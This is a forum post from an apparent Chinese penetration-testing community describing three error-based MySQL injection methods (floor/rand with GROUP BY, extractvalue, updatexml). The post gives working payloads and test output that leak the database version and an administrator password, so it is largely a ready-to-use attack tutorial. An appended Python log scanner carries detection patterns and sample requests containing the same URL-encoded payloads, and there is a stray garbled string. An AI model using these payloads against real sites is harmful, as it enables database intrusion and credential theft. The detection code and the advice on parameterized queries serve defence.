China Network Penetration Testing Alliance

Title: On three error-based methods in MySQL injection

Author: admin    Time: 2012-12-10 10:28
Posting some of my old notes. MySQL throws an error message when a statement fails, and sites built on PHP+MySQL often display that error text on the page, so specific data can be obtained by constructing the following three kinds of statements.

Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor

The following payloads can be used (the first one was missing its opening parenthesis; it is written here in the same form used in the test below):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version was successfully leaked. To retrieve other data, replace the version() expression with the query you need.
For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
! k4 ~( e4 g7 A5 D, M, o2 eAll, thanks foreign guys.
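As an added example (not code from the original post), here is a small Python scanner that flags access-log requests carrying the three error-based signatures described above: floor(rand()) with GROUP BY, extractvalue(), and updatexml(). The log lines, IPs and label names are constructed for the demonstration.

```python
# Added example (not from the original post): flag HTTP requests carrying one of the three
# error-based MySQL injection signatures the post describes. The log lines are constructed
# for this demonstration and follow the Apache "combined" layout.
import re
from urllib.parse import unquote_plus

# Regexes run over the decoded, lower-cased query string; all patterns of a tuple must match.
SIGNATURES = {
    "floor_rand_groupby": (re.compile(r"floor\s*\(\s*rand\s*\("), re.compile(r"group\s+by")),
    "extractvalue": (re.compile(r"\bextractvalue\s*\("),),
    "updatexml": (re.compile(r"\bupdatexml\s*\("),),
}
# ip ident user [timestamp] "METHOD URL PROTO" status size
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) \S+" (?P<status>\d{3})')

def normalize(query_string):
    """Decode twice (catches double URL-encoding), lower-case, drop /**/ padding, collapse blanks."""
    text = unquote_plus(unquote_plus(query_string)).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def classify(url):
    """Return the technique name when the URL's query string matches a signature, else None."""
    text = normalize(url.split("?", 1)[1] if "?" in url else "")
    for name, patterns in SIGNATURES.items():
        if all(p.search(text) for p in patterns):
            return name
    return None

def scan(log_lines):
    """Return (ip, status, technique) for every parsable line that matches a signature."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        technique = classify(m.group("url")) if m else None
        if technique:
            hits.append((m.group("ip"), m.group("status"), technique))
    return hits

# Constructed sample: one benign request, then the three payloads from the post, URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2012:10:28:01 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Dec/2012:10:28:05 +0800] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 233',
    '10.0.0.9 - - [10/Dec/2012:10:28:07 +0800] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 198',
    '10.0.0.9 - - [10/Dec/2012:10:28:09 +0800] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20user()),0x5e24),1)) HTTP/1.1" 500 201',
]
```

Matching these patterns is only a detection aid; the fix on the application side is parameterized queries and not echoing database error text (the 'Duplicate entry' and 'XPATH syntax error' messages shown above) back to the client.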
China Network Penetration Testing Alliance (https://cobjon.com/), powered by Discuz! X3.2